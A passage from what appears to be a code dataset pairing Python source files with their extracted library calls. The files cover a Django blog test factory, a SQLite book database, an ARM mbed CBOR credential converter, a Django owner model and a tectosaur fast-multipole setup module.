"homeassistant.components.verisure.HUB.update_mousede... | [((359, 386), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (376, 386), False, 'import logging\n'), ((525, 560), 'homeassistant.components.verisure.HUB.config.get', 'hub.config.get', (['"""thermometers"""', '"""1"""'], {}), "('thermometers', '1')\n", (539, 560), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((571, 591), 'homeassistant.components.verisure.HUB.update_climate', 'hub.update_climate', ([], {}), '()\n', (589, 591), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((806, 840), 'homeassistant.components.verisure.HUB.config.get', 'hub.config.get', (['"""hygrometers"""', '"""1"""'], {}), "('hygrometers', '1')\n", (820, 840), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((851, 871), 'homeassistant.components.verisure.HUB.update_climate', 'hub.update_climate', ([], {}), '()\n', (869, 871), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((1079, 1107), 'homeassistant.components.verisure.HUB.config.get', 'hub.config.get', (['"""mouse"""', '"""1"""'], {}), "('mouse', '1')\n", (1093, 1107), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((1118, 1145), 'homeassistant.components.verisure.HUB.update_mousedetection', 'hub.update_mousedetection', ([], {}), '()\n', (1143, 1145), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((2289, 2309), 'homeassistant.components.verisure.HUB.update_climate', 'hub.update_climate', ([], {}), '()\n', (2307, 2309), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((3167, 3187), 'homeassistant.components.verisure.HUB.update_climate', 'hub.update_climate', ([], {}), '()\n', (3185, 3187), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((4012, 4039), 'homeassistant.components.verisure.HUB.update_mousedetection', 'hub.update_mousedetection', ([], {}), '()\n', (4037, 4039), True, 
'from homeassistant.components.verisure import HUB as hub\n'), ((684, 711), 'homeassistant.components.verisure.HUB.climate_status.values', 'hub.climate_status.values', ([], {}), '()\n', (709, 711), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((963, 990), 'homeassistant.components.verisure.HUB.climate_status.values', 'hub.climate_status.values', ([], {}), '()\n', (988, 990), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((1250, 1275), 'homeassistant.components.verisure.HUB.mouse_status.values', 'hub.mouse_status.values', ([], {}), '()\n', (1273, 1275), True, 'from homeassistant.components.verisure import HUB as hub\n')] |
import factory
from factory.django import DjangoModelFactory as Factory
from django.contrib.auth.models import Permission
from ..models import Blog
from articles.users.tests.factories import UserFactory
class Blogfactory(Factory):
    """Factory that builds ``Blog`` instances with faked content.

    The owning user is created through ``UserFactory`` and ``status`` is a
    random valid choice taken from ``Blog.STATUS_CHOICES``.
    """

    # BUG FIX: the original read ``user = user = factory.SubFactory(...)``,
    # a duplicated assignment.
    user = factory.SubFactory(UserFactory)
    title = factory.Faker('sentence', nb_words=3)
    description = factory.Faker('paragraph', nb_sentences=5)
    content = factory.Faker('paragraph', nb_sentences=10)
    gdoc_link = 'https://docs.google.com/document/d/1NcF8_6ZMraTXp7H7DVzR6pbqzJgNIyg3gYLUUoFoYe8/edit'
    # First element of each choice tuple is the stored status code.
    status = factory.Faker('random_element',
                           elements=[choice[0] for choice in Blog.STATUS_CHOICES])

    class Meta:
        model = Blog
def create_user_writer_with_permission():
    """Build a user and grant them the ``can_write_blogs`` permission."""
    writer = UserFactory()
    permission = Permission.objects.filter(codename='can_write_blogs').first()
    writer.user_permissions.add(permission)
    return writer
def create_editor_user_with_permission():
    """Build a user and grant them the ``can_review_blogs`` permission."""
    editor = UserFactory()
    permission = Permission.objects.filter(codename='can_review_blogs').first()
    editor.user_permissions.add(permission)
    return editor
| [
"factory.SubFactory",
"factory.Faker",
"django.contrib.auth.models.Permission.objects.filter",
"articles.users.tests.factories.UserFactory"
] | [((253, 284), 'factory.SubFactory', 'factory.SubFactory', (['UserFactory'], {}), '(UserFactory)\n', (271, 284), False, 'import factory\n'), ((297, 334), 'factory.Faker', 'factory.Faker', (['"""sentence"""'], {'nb_words': '(3)'}), "('sentence', nb_words=3)\n", (310, 334), False, 'import factory\n'), ((353, 395), 'factory.Faker', 'factory.Faker', (['"""paragraph"""'], {'nb_sentences': '(5)'}), "('paragraph', nb_sentences=5)\n", (366, 395), False, 'import factory\n'), ((410, 453), 'factory.Faker', 'factory.Faker', (['"""paragraph"""'], {'nb_sentences': '(10)'}), "('paragraph', nb_sentences=10)\n", (423, 453), False, 'import factory\n'), ((570, 662), 'factory.Faker', 'factory.Faker', (['"""random_element"""'], {'elements': '[sttaus[0] for sttaus in Blog.STATUS_CHOICES]'}), "('random_element', elements=[sttaus[0] for sttaus in Blog.\n STATUS_CHOICES])\n", (583, 662), False, 'import factory\n'), ((751, 764), 'articles.users.tests.factories.UserFactory', 'UserFactory', ([], {}), '()\n', (762, 764), False, 'from articles.users.tests.factories import UserFactory\n'), ((969, 982), 'articles.users.tests.factories.UserFactory', 'UserFactory', ([], {}), '()\n', (980, 982), False, 'from articles.users.tests.factories import UserFactory\n'), ((788, 841), 'django.contrib.auth.models.Permission.objects.filter', 'Permission.objects.filter', ([], {'codename': '"""can_write_blogs"""'}), "(codename='can_write_blogs')\n", (813, 841), False, 'from django.contrib.auth.models import Permission\n'), ((1007, 1061), 'django.contrib.auth.models.Permission.objects.filter', 'Permission.objects.filter', ([], {'codename': '"""can_review_blogs"""'}), "(codename='can_review_blogs')\n", (1032, 1061), False, 'from django.contrib.auth.models import Permission\n')] |
import sqlite3
class Database:
    """Thin CRUD wrapper around an SQLite ``book`` table.

    Columns: id (autoincrementing primary key), title, author, year, isbn.
    """

    def __init__(self, db):
        """Open (or create) *db* and ensure the ``book`` table exists.

        :param db: path to the database file (or ``":memory:"``).
        """
        self.conn = sqlite3.connect(db)
        # FIX: use an explicit cursor instead of the cursor returned by
        # Connection.execute() for the one-off DDL statement.
        self.cur = self.conn.cursor()
        self.cur.execute(
            "CREATE TABLE IF NOT EXISTS book (id INTEGER PRIMARY KEY, "
            "title TEXT, author TEXT, year INTEGER, isbn INTEGER)")
        self.conn.commit()

    def insert(self, title, author, year, isbn):
        """Add a new book row; the id is assigned automatically."""
        self.cur.execute("INSERT INTO book VALUES (NULL,?,?,?,?)",
                         (title, author, year, isbn))
        self.conn.commit()

    def view(self):
        """Return every row of the table as a list of tuples."""
        self.cur.execute("SELECT * FROM book")
        return self.cur.fetchall()

    def search(self, title="", author="", year="", isbn=""):
        """Return rows where any supplied field matches exactly (OR semantics).

        NOTE: unspecified fields default to "" and still take part in the OR,
        so a row with an empty stored value would also match — preserved from
        the original behavior.
        """
        self.cur.execute(
            "SELECT * FROM book WHERE title=? OR author=? OR year=? OR isbn=?",
            (title, author, year, isbn))
        return self.cur.fetchall()

    def delete(self, id):
        """Remove the row with primary key *id*."""
        self.cur.execute("DELETE FROM book WHERE id=?", (id,))
        self.conn.commit()

    def update(self, id, title, author, year, isbn):
        """Overwrite every field of the row with primary key *id*."""
        self.cur.execute(
            "UPDATE book SET title=?, author=?, year=?, isbn=? WHERE id=?",
            (title, author, year, isbn, id))
        self.conn.commit()

    def __del__(self):
        # FIX: guard the close — during interpreter shutdown the connection
        # (or sqlite3 module) may already be torn down and close() can raise.
        try:
            self.conn.close()
        except Exception:
            pass
"sqlite3.connect"
] | [((119, 138), 'sqlite3.connect', 'sqlite3.connect', (['db'], {}), '(db)\n', (134, 138), False, 'import sqlite3\n')] |
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright 2018 ARM Ltd.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
import os
import cbor2
import struct
from pyclibrary import CParser
from collections import namedtuple
# Names of C variables that hold DER certificates.
CERTIFICATE_KEYS = ('MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_CERTIFICATE',
                    'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_ROOT_CA_CERTIFICATE',
                    'arm_uc_default_certificate')

# Names of C variables that hold private keys.
# BUG FIX: the original was missing the trailing comma, making KEY_KEYS a
# plain string, so ``key in KEY_KEYS`` performed substring matching instead
# of exact tuple membership.
KEY_KEYS = ('MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_PRIVATE_KEY',)

# Names of C variables carrying update-campaign identity material.
UPDATE_KEYS = ('arm_uc_default_certificate',
               'arm_uc_class_id',
               'arm_uc_vendor_id')

# Maps each C variable name to its key in the CBOR configuration store.
KEY_MAP = {
    'MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_CERTIFICATE': 'mbed.BootstrapDeviceCert',
    'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_ROOT_CA_CERTIFICATE': 'mbed.BootstrapServerCACert',
    'MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_PRIVATE_KEY': 'mbed.BootstrapDevicePrivateKey',
    'MBED_CLOUD_DEV_BOOTSTRAP_ENDPOINT_NAME': 'mbed.EndpointName',
    'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_URI': 'mbed.BootstrapServerURI',
    'MBED_CLOUD_DEV_ACCOUNT_ID': 'mbed.AccountID',
    'MBED_CLOUD_DEV_MANUFACTURER': 'mbed.Manufacturer',
    'MBED_CLOUD_DEV_MODEL_NUMBER': 'mbed.ModelNumber',
    'MBED_CLOUD_DEV_SERIAL_NUMBER': 'mbed.SerialNumber',
    'MBED_CLOUD_DEV_DEVICE_TYPE': 'mbed.DeviceType',
    'MBED_CLOUD_DEV_HARDWARE_VERSION': 'mbed.HardwareVersion',
    'MBED_CLOUD_DEV_MEMORY_TOTAL_KB': 'mbed.MemoryTotalKB',
    'arm_uc_default_certificate': 'mbed.UpdateAuthCert',
    'arm_uc_class_id': 'mbed.ClassId',
    'arm_uc_vendor_id': 'mbed.VendorId'
}

# Record shapes serialized into the CBOR output.
ConfigParam = namedtuple('ConfigParam', ['Data', 'Name'])
Certificate = namedtuple('Certificate', ['Data', 'Format', 'Name'])
Key = namedtuple('Key', ['Data', 'Format', 'Name', 'Type'])
class CBORConverter():
    """Converts parsed mbed Cloud developer credential C files into a CBOR blob.

    Two C sources are parsed (the developer certificate and the update
    resource); their variables are mapped through KEY_MAP into the CBOR
    configuration-store schema and written to ``cbor_file``.
    """

    def __init__(self, development_certificate, update_resource, cbor_file):
        self.development_certificate = development_certificate
        self.update_resource = update_resource
        self.cbor_file = cbor_file

    def __check_file_exists(self, path):
        """Return True if *path* is an existing file, printing a warning otherwise."""
        if not os.path.isfile(path):
            # BUG FIX: the original printed the bare format string without
            # ever interpolating the path.
            print("File '%s' does not exist." % path)
            return False
        return True

    def parse_c_file(self):
        """Parse both input C files and return their merged values dict, or None."""
        if not self.__check_file_exists(self.development_certificate) or \
           not self.__check_file_exists(self.update_resource):
            return None
        values = {}
        values.update(CParser([self.development_certificate]).defs.get('values'))
        # The update resource is guarded by these macros; define them so the
        # parser sees the variable definitions.
        values.update(CParser([self.update_resource],
                              macros={
                                  'MBED_CLOUD_DEV_UPDATE_ID': 1,
                                  'MBED_CLOUD_DEV_UPDATE_CERT': 1
                              }).defs.get('values'))
        return values

    def create_cbor_data(self, vars):
        """Map the parsed C variables (*vars*) onto the CBOR store schema."""
        cbor_data = {'Certificates': [],
                     'Keys': [],
                     'ConfigParams': [],
                     'SchemeVersion': '0.0.1'}
        use_bootstrap = 1 if 'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_URI' in vars.keys() else 0
        cbor_data['ConfigParams'].append(ConfigParam(use_bootstrap, 'mbed.UseBootstrap')._asdict())
        for key in vars.keys():
            var = vars.get(key)
            cbor_var_key = KEY_MAP.get(key, None)
            # Guard clause: skip variables without a store mapping.
            if cbor_var_key is None:
                print("Key %s not in KEY_MAP." % key)
                continue
            if key in CERTIFICATE_KEYS:
                # C byte arrays arrive as int sequences; repack them as bytes.
                byte_data = struct.pack('%sB' % len(var), *var)
                certificate = Certificate(byte_data, 'der', cbor_var_key)._asdict()
                cbor_data['Certificates'].append(certificate)
            elif key in KEY_KEYS:
                byte_data = struct.pack('%sB' % len(var), *var)
                private_key = Key(byte_data, 'der', cbor_var_key, 'ECCPrivate')._asdict()
                cbor_data['Keys'].append(private_key)
            elif key in UPDATE_KEYS:
                byte_data = struct.pack('%sB' % len(var), *var)
                config_param = ConfigParam(byte_data, cbor_var_key)._asdict()
                cbor_data['ConfigParams'].append(config_param)
            else:
                # Scalar/string config values pass through unchanged.
                config_param = ConfigParam(var, cbor_var_key)._asdict()
                cbor_data['ConfigParams'].append(config_param)
        return cbor_data

    def convert_to_cbor(self):
        """Parse the inputs and write the resulting CBOR data to ``self.cbor_file``."""
        parsed = self.parse_c_file()  # renamed: original local shadowed builtin vars()
        if not parsed:
            print("No variables parsed.")
        else:
            cbor_data = self.create_cbor_data(parsed)
            with open(self.cbor_file, 'wb') as out_file:
                cbor2.dump(cbor_data, out_file)
| [
"os.path.isfile",
"pyclibrary.CParser",
"collections.namedtuple",
"cbor2.dump"
] | [((2216, 2259), 'collections.namedtuple', 'namedtuple', (['"""ConfigParam"""', "['Data', 'Name']"], {}), "('ConfigParam', ['Data', 'Name'])\n", (2226, 2259), False, 'from collections import namedtuple\n'), ((2274, 2327), 'collections.namedtuple', 'namedtuple', (['"""Certificate"""', "['Data', 'Format', 'Name']"], {}), "('Certificate', ['Data', 'Format', 'Name'])\n", (2284, 2327), False, 'from collections import namedtuple\n'), ((2334, 2387), 'collections.namedtuple', 'namedtuple', (['"""Key"""', "['Data', 'Format', 'Name', 'Type']"], {}), "('Key', ['Data', 'Format', 'Name', 'Type'])\n", (2344, 2387), False, 'from collections import namedtuple\n'), ((2693, 2713), 'os.path.isfile', 'os.path.isfile', (['path'], {}), '(path)\n', (2707, 2713), False, 'import os\n'), ((5254, 5285), 'cbor2.dump', 'cbor2.dump', (['cbor_data', 'out_file'], {}), '(cbor_data, out_file)\n', (5264, 5285), False, 'import cbor2\n'), ((3041, 3080), 'pyclibrary.CParser', 'CParser', (['[self.development_certificate]'], {}), '([self.development_certificate])\n', (3048, 3080), False, 'from pyclibrary import CParser\n'), ((3123, 3231), 'pyclibrary.CParser', 'CParser', (['[self.update_resource]'], {'macros': "{'MBED_CLOUD_DEV_UPDATE_ID': 1, 'MBED_CLOUD_DEV_UPDATE_CERT': 1}"}), "([self.update_resource], macros={'MBED_CLOUD_DEV_UPDATE_ID': 1,\n 'MBED_CLOUD_DEV_UPDATE_CERT': 1})\n", (3130, 3231), False, 'from pyclibrary import CParser\n')] |
from django.db import models
# Create your models here.
class Owner(models.Model):
    """Rental-agency owner profile: identity, contact details and license image."""

    # BUG FIX: the original read ``Owner_id = models.AutoField`` — assigning
    # the field *class*, not an instance — so no Owner_id column was created.
    # NOTE(review): making this the primary key requires a migration; confirm
    # against the deployed schema before applying.
    Owner_id = models.AutoField(primary_key=True)
    Owner_firstname = models.CharField(max_length=60)
    Owner_lastname = models.CharField(max_length=60)
    Owner_address = models.CharField(max_length=600)
    Owner_email = models.CharField(max_length=100)
    Owner_password = models.CharField(max_length=32)
    Owner_dob = models.DateField()
    Owner_mobileno = models.CharField(max_length=10)
    Owner_gender = models.CharField(max_length=15)
    # Uploaded image of the owner's license document.
    Owner_license = models.ImageField(upload_to='img/Owner_License/')
    Owner_agency = models.CharField(max_length=100)
    Owner_city = models.CharField(max_length=30)
    Owner_state = models.CharField(max_length=30)
    Owner_country = models.CharField(max_length=30)
    Owner_pincode = models.IntegerField()
    # Role flag distinguishing owners from other account types.
    isOwner = models.BooleanField(default=True)

    def __str__(self):
        return self.Owner_email + ": " + str(self.Owner_license)
"django.db.models.DateField",
"django.db.models.IntegerField",
"django.db.models.BooleanField",
"django.db.models.ImageField",
"django.db.models.CharField"
] | [((138, 169), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(60)'}), '(max_length=60)\n', (154, 169), False, 'from django.db import models\n'), ((191, 222), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(60)'}), '(max_length=60)\n', (207, 222), False, 'from django.db import models\n'), ((243, 275), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(600)'}), '(max_length=600)\n', (259, 275), False, 'from django.db import models\n'), ((294, 326), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (310, 326), False, 'from django.db import models\n'), ((348, 379), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(32)'}), '(max_length=32)\n', (364, 379), False, 'from django.db import models\n'), ((396, 414), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (412, 414), False, 'from django.db import models\n'), ((436, 467), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(10)'}), '(max_length=10)\n', (452, 467), False, 'from django.db import models\n'), ((487, 518), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(15)'}), '(max_length=15)\n', (503, 518), False, 'from django.db import models\n'), ((540, 589), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""img/Owner_License/"""'}), "(upload_to='img/Owner_License/')\n", (557, 589), False, 'from django.db import models\n'), ((609, 641), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (625, 641), False, 'from django.db import models\n'), ((659, 690), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (675, 690), False, 'from django.db import models\n'), ((709, 740), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (725, 740), False, 
'from django.db import models\n'), ((761, 792), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (777, 792), False, 'from django.db import models\n'), ((813, 834), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (832, 834), False, 'from django.db import models\n'), ((849, 882), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (868, 882), False, 'from django.db import models\n')] |
import numpy as np
import tectosaur.util.gpu as gpu
from tectosaur.fmm.c2e import build_c2e
import logging
logger = logging.getLogger(__name__)
def make_tree(m, cfg, max_pts_per_cell):
    """Build the traversal tree over the triangles of mesh ``m``.

    Each entry is a triangle centroid paired with a radius large enough to
    enclose all three of its vertices.
    """
    corners = m[0][m[1]]
    centers = corners.mean(axis=1)
    spread = corners - centers[:, np.newaxis, :]
    radii = np.linalg.norm(spread, axis=2).max(axis=1)
    return cfg.traversal_module.Tree.build(centers, radii, max_pts_per_cell)
class FMM:
    """Stages all data needed for a GPU fast-multipole evaluation.

    Construction runs the full setup pipeline in a fixed order: interaction
    lists are built from the two trees, GPU kernels are collected, buffer
    sizes computed, and all parameters, mesh/tree data, interaction lists and
    check-to-equivalent operators are uploaded to the GPU.
    """

    def __init__(self, obs_tree, obs_m, src_tree, src_m, cfg):
        # obs_m / src_m are (points, triangles) mesh pairs, matching make_tree.
        self.cfg = cfg
        self.obs_tree = obs_tree
        self.obs_m = obs_m
        self.src_tree = src_tree
        self.src_m = src_m
        self.gpu_data = dict()
        # NOTE: the call order below matters — later stages read attributes
        # produced by earlier ones (e.g. interactions_to_gpu needs
        # self.interactions from setup_interactions).
        self.setup_interactions()
        self.collect_gpu_ops()
        self.setup_output_sizes()
        self.params_to_gpu()
        self.tree_to_gpu(obs_m, src_m)
        self.interactions_to_gpu()
        self.d2e_u2e_ops_to_gpu()

    def setup_interactions(self):
        """Build the FMM interaction lists between the obs and src trees."""
        self.interactions = self.cfg.traversal_module.fmmmm_interactions(
            self.obs_tree, self.src_tree, self.cfg.inner_r, self.cfg.outer_r,
            self.cfg.order, self.cfg.treecode
        )

    def collect_gpu_ops(self):
        """Look up the kernel implementations for this cfg's kernel name.

        Produces the four pairwise ops (s2s, s2p, p2s, p2p — 's'/'p'
        presumably surface/point; confirm against the GPU module) plus the
        two check-to-equivalent kernels.
        """
        self.gpu_ops = dict()
        for a in ['s', 'p']:
            for b in ['s', 'p']:
                name = a + '2' + b
                self.gpu_ops[name] = getattr(self.cfg.gpu_module, name + '_' + self.cfg.K.name)
        self.gpu_ops['c2e1'] = self.cfg.gpu_module.c2e_kernel1
        self.gpu_ops['c2e2'] = self.cfg.gpu_module.c2e_kernel2

    def setup_output_sizes(self):
        """Compute buffer sizes; 9 degrees of freedom per triangle throughout."""
        self.n_surf_tris = self.cfg.surf[1].shape[0]
        self.n_surf_dofs = self.n_surf_tris * 9
        self.n_multipoles = self.n_surf_dofs * self.src_tree.n_nodes
        self.n_locals = self.n_surf_dofs * self.obs_tree.n_nodes
        self.n_input = self.src_m[1].shape[0] * 9
        self.n_output = self.obs_m[1].shape[0] * 9

    def float_gpu(self, arr):
        # Upload using the configured float precision.
        return gpu.to_gpu(arr, self.cfg.float_type)

    def int_gpu(self, arr):
        # Upload as 32-bit integers (index data).
        return gpu.to_gpu(arr, np.int32)

    def params_to_gpu(self):
        """Upload the kernel parameter array."""
        self.gpu_data['params'] = self.float_gpu(self.cfg.params)

    def tree_to_gpu(self, obs_m, src_m):
        """Upload mesh geometry and per-node tree data for both trees.

        Triangles are reordered by each tree's orig_idxs so they match the
        tree's internal point ordering.
        """
        gd = self.gpu_data
        gd['obs_pts'] = self.float_gpu(obs_m[0])
        gd['obs_tris'] = self.int_gpu(obs_m[1][self.obs_tree.orig_idxs])
        gd['src_pts'] = self.float_gpu(src_m[0])
        gd['src_tris'] = self.int_gpu(src_m[1][self.src_tree.orig_idxs])
        obs_tree_nodes = self.obs_tree.nodes
        src_tree_nodes = self.src_tree.nodes
        # Node centers and radii for each tree.
        for name, tree in [('src', self.src_tree), ('obs', self.obs_tree)]:
            gd[name + '_n_C'] = self.float_gpu(tree.node_centers)
            gd[name + '_n_R'] = self.float_gpu(tree.node_Rs)
        # Per-node [start, end) index ranges.
        for name, tree in [('src', src_tree_nodes), ('obs', obs_tree_nodes)]:
            gd[name + '_n_start'] = self.int_gpu(np.array([n.start for n in tree]))
            gd[name + '_n_end'] = self.int_gpu(np.array([n.end for n in tree]))

    def interactions_to_gpu(self):
        """Upload every interaction list; per-level ops get a level suffix."""
        op_names = ['p2p', 'p2m', 'p2l', 'm2p', 'm2m', 'm2l', 'l2p', 'l2l']
        for name in op_names:
            op = getattr(self.interactions, name)
            if type(op) is list:
                # m2m/l2l are stored per tree level: upload as name0, name1, ...
                for i, op_level in enumerate(op):
                    self.op_to_gpu(name + str(i), op_level)
            else:
                self.op_to_gpu(name, op)

    def op_to_gpu(self, name, op):
        """Upload one interaction list's three index arrays under *name*."""
        for data_name in ['obs_n_idxs', 'obs_src_starts', 'src_n_idxs']:
            self.gpu_data[name + '_' + data_name] = self.int_gpu(
                np.array(getattr(op, data_name), copy = False)
            )

    def d2e_u2e_ops_to_gpu(self):
        """Upload the up/down check-to-equivalent (u2e/d2e) operators.

        The SVD factors (UT, E, V) come from build_c2e; note the inner/outer
        radii are swapped between the u2e (src tree) and d2e (obs tree) cases.
        """
        gd = self.gpu_data
        gd['u2e_obs_n_idxs'] = [
            self.int_gpu(np.array(self.interactions.u2e[level].obs_n_idxs, copy = False))
            for level in range(len(self.interactions.m2m))
        ]
        gd['d2e_obs_n_idxs'] = [
            self.int_gpu(np.array(self.interactions.d2e[level].obs_n_idxs, copy = False))
            for level in range(len(self.interactions.l2l))
        ]
        u2e_UT, u2e_E, u2e_V = build_c2e(
            self.src_tree, self.cfg.outer_r, self.cfg.inner_r, self.cfg
        )
        gd['u2e_V'] = self.float_gpu(u2e_V)
        gd['u2e_E'] = self.float_gpu(u2e_E)
        gd['u2e_UT'] = self.float_gpu(u2e_UT)
        d2e_UT, d2e_E, d2e_V = build_c2e(
            self.obs_tree, self.cfg.inner_r, self.cfg.outer_r, self.cfg
        )
        gd['d2e_V'] = self.float_gpu(d2e_V)
        gd['d2e_E'] = self.float_gpu(d2e_E)
        gd['d2e_UT'] = self.float_gpu(d2e_UT)

    def to_tree(self, input_orig):
        """Permute a flat (n_tris*9,) input vector into tree ordering."""
        orig_idxs = np.array(self.src_tree.orig_idxs)
        input_orig = input_orig.reshape((-1,9))
        return input_orig[orig_idxs,:].flatten()

    def to_orig(self, output_tree):
        """Permute a flat tree-ordered output vector back to original ordering."""
        orig_idxs = np.array(self.obs_tree.orig_idxs)
        output_tree = output_tree.reshape((-1, 9))
        output_orig = np.empty_like(output_tree)
        output_orig[orig_idxs,:] = output_tree
        return output_orig.flatten()
def report_interactions(fmm_obj):
dim = fmm_obj.obs_m[1].shape[1]
order = fmm_obj.cfg.surf[1].shape[0]
def count_interactions(op_name, op):
obs_surf = False if op_name[2] == 'p' else True
src_surf = False if op_name[0] == 'p' else True
return fmm_obj.cfg.traversal_module.count_interactions(
op, fmm_obj.obs_tree, fmm_obj.src_tree,
obs_surf, src_surf, order
)
n_obs_tris = fmm_obj.obs_m[1].shape[0]
n_src_tris = fmm_obj.src_m[1].shape[0]
level_ops = ['m2m', 'l2l']
ops = ['p2m', 'p2l', 'm2l', 'p2p', 'm2p', 'l2p']
interactions = dict()
for op_name in ops:
op = getattr(fmm_obj.interactions, op_name)
interactions[op_name] = count_interactions(op_name, op)
for op_name in level_ops:
ops = getattr(fmm_obj.interactions, op_name)
for op in ops:
if op_name not in interactions:
interactions[op_name] = 0
interactions[op_name] += count_interactions(op_name, op)
direct_i = n_obs_tris * n_src_tris
fmm_i = sum([v for k,v in interactions.items()])
logger.info('compression factor: ' + str(fmm_i / direct_i))
logger.info('# obs tris: ' + str(n_obs_tris))
logger.info('# src tris: ' + str(n_src_tris))
logger.info('total tree interactions: %e' % fmm_i)
for k, v in interactions.items():
logger.info('total %s interactions: %e' % (k, v))
| [
"logging.getLogger",
"numpy.mean",
"tectosaur.fmm.c2e.build_c2e",
"tectosaur.util.gpu.to_gpu",
"numpy.array",
"numpy.empty_like",
"numpy.linalg.norm"
] | [((118, 145), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (135, 145), False, 'import logging\n'), ((227, 251), 'numpy.mean', 'np.mean', (['tri_pts'], {'axis': '(1)'}), '(tri_pts, axis=1)\n', (234, 251), True, 'import numpy as np\n'), ((318, 349), 'numpy.linalg.norm', 'np.linalg.norm', (['pt_dist'], {'axis': '(2)'}), '(pt_dist, axis=2)\n', (332, 349), True, 'import numpy as np\n'), ((1980, 2016), 'tectosaur.util.gpu.to_gpu', 'gpu.to_gpu', (['arr', 'self.cfg.float_type'], {}), '(arr, self.cfg.float_type)\n', (1990, 2016), True, 'import tectosaur.util.gpu as gpu\n'), ((2061, 2086), 'tectosaur.util.gpu.to_gpu', 'gpu.to_gpu', (['arr', 'np.int32'], {}), '(arr, np.int32)\n', (2071, 2086), True, 'import tectosaur.util.gpu as gpu\n'), ((4161, 4231), 'tectosaur.fmm.c2e.build_c2e', 'build_c2e', (['self.src_tree', 'self.cfg.outer_r', 'self.cfg.inner_r', 'self.cfg'], {}), '(self.src_tree, self.cfg.outer_r, self.cfg.inner_r, self.cfg)\n', (4170, 4231), False, 'from tectosaur.fmm.c2e import build_c2e\n'), ((4420, 4490), 'tectosaur.fmm.c2e.build_c2e', 'build_c2e', (['self.obs_tree', 'self.cfg.inner_r', 'self.cfg.outer_r', 'self.cfg'], {}), '(self.obs_tree, self.cfg.inner_r, self.cfg.outer_r, self.cfg)\n', (4429, 4490), False, 'from tectosaur.fmm.c2e import build_c2e\n'), ((4704, 4737), 'numpy.array', 'np.array', (['self.src_tree.orig_idxs'], {}), '(self.src_tree.orig_idxs)\n', (4712, 4737), True, 'import numpy as np\n'), ((4892, 4925), 'numpy.array', 'np.array', (['self.obs_tree.orig_idxs'], {}), '(self.obs_tree.orig_idxs)\n', (4900, 4925), True, 'import numpy as np\n'), ((4999, 5025), 'numpy.empty_like', 'np.empty_like', (['output_tree'], {}), '(output_tree)\n', (5012, 5025), True, 'import numpy as np\n'), ((2920, 2953), 'numpy.array', 'np.array', (['[n.start for n in tree]'], {}), '([n.start for n in tree])\n', (2928, 2953), True, 'import numpy as np\n'), ((3002, 3033), 'numpy.array', 'np.array', (['[n.end for n in tree]'], {}), '([n.end for 
n in tree])\n', (3010, 3033), True, 'import numpy as np\n'), ((3802, 3863), 'numpy.array', 'np.array', (['self.interactions.u2e[level].obs_n_idxs'], {'copy': '(False)'}), '(self.interactions.u2e[level].obs_n_idxs, copy=False)\n', (3810, 3863), True, 'import numpy as np\n'), ((3995, 4056), 'numpy.array', 'np.array', (['self.interactions.d2e[level].obs_n_idxs'], {'copy': '(False)'}), '(self.interactions.d2e[level].obs_n_idxs, copy=False)\n', (4003, 4056), True, 'import numpy as np\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Project: Fable Input Output
# https://github.com/silx-kit/fabio
#
# Copyright (C) European Synchrotron Radiation Facility, Grenoble, France
#
# Principal author: <NAME> (<EMAIL>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Multiwire Unit tests"""
from __future__ import print_function, with_statement, division, absolute_import
import unittest
import logging
logger = logging.getLogger(__name__)
import fabio
from ..utilstest import UtilsTest
